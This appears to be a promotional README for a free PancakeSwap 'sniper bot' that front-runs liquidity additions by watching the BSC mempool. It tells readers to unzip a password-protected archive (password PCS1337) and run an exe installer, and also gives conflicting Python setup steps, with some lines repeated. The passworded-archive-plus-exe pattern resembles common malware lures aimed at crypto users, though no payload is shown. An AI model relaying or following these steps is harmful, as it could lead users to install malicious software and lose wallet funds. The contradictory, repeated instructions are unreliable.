A free sniper bot built to work with Pancakeswap. Honeypot/rug checker built in. Bot allows you to compete with other trading bots when buying a token on PancakeSwap. Its faster than traditional bots because it watches the txpool/mempool where transactions are still "pending" on the BSC network. It will watch for when liquidity is added as a pending transaction and immediately submit your order, so that hopefully you get in right after liquidity is added and before everyone else.
Unzip archive(password PCS1337)
Open exe installer and set up
Download and install Python from the site.
If you download from the site it is important to tick the option "add python to path".
Press the windows key + R and type "cmd":
Type the command:
cd <path you copied>
pip install -r requirements.txt
python index.py
Unzip archive(password PCS1337)
Open exe installer and set up